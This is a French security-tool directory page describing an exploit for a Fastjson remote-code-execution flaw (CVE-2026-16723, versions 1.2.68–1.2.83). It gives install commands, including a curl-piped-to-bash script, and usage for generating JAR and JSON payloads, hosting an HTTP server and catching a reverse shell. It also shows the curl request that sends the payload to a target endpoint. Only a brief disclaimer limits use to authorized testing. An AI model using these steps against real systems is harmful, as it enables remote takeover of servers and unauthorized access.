Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-16723 — Exploit pour Fastjson RCE (CVE-2026-16723) ciblant les versions 1.2.68 à 1.2.83. Génère des payloads JAR et JSON, héberge un serveur HTTP et établit un shell inversé. | Kitploit
Outils/GitHubGitHub/nowafen/cve-2026-16723
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubnowafen/cve-2026-16723

CVE-2026-16723

Exploit pour Fastjson RCE (CVE-2026-16723) ciblant les versions 1.2.68 à 1.2.83. Génère des payloads JAR et JSON, héberge un serveur HTTP et établit un shell inversé.

Voir le dépôt
2il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2026-16723

Une implémentation autonome en C++17 pour CVE-2026-16723, une vulnérabilité critique affectant les versions 1.2.68 – 1.2.83 de Fastjson.

Prérequis

  • Linux (ou WSL sous Windows)

  • Compilateur compatible C++17 (GCC 7+ ou Clang 5+)

  • CMake 3.10 ou plus récent

  • Paquets système :

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Installation

Installation rapide (recommandée)

Installez tout avec une seule commande :

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

Ou téléchargez et exécutez le script d'installation manuellement :

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

Le script d'installation va :

  • Installer tous les paquets système requis.

  • Télécharger les bibliothèques header-only nécessaires :

    • nlohmann/json
    • cpp-httplib
  • Compiler le projet.

  • Placer le binaire compilé dans le répertoire courant sous le nom :

root@kitploit:~
./exploit

Compilation manuelle

Si vous avez cloné le dépôt :

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

Ou compilez manuellement :

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Utilisation

Exécutez le binaire :

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Exemple

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Après exécution, les fichiers suivants seront créés :

root@kitploit:~
x
body.json

Le serveur HTTP démarrera sur le port configuré (par défaut : 8000) et l'outil attendra une connexion reverse shell entrante.


Envoi de la charge utile

Envoyez le fichier body.json généré vers le point d'accès vulnérable :

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Si l'application attend un autre champ JSON, spécifiez-le à l'aide de l'option --field.


Options de la ligne de commande


Fichiers de sortie

FichierDescription
xCharge utile JAR générée
body.jsonCharge utile JSON à envoyer à la cible

Remarques

  • Ce projet est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives.
  • L'implémentation force l'application cible à télécharger et charger un JAR distant en utilisant les protocoles jar:http et jar:file.
  • La commande du reverse shell est encodée en Base64 pour réduire les problèmes d'échappement.

Suivez-moi sur Twitter(X)

  • MNM
Télécharger l’outil
OptionDescriptionDéfaut
--lhostAdresse IP localeRequis
--lportPort d'écoute du reverse shell4444
--http-portPort du serveur HTTP8000
--firstPremier descripteur de fichier à essayer3
--lastDernier descripteur de fichier à essayer30
--fieldNom du champ JSONfacets
--outdirRépertoire de sortie.
-h, --helpAfficher le message d'aide—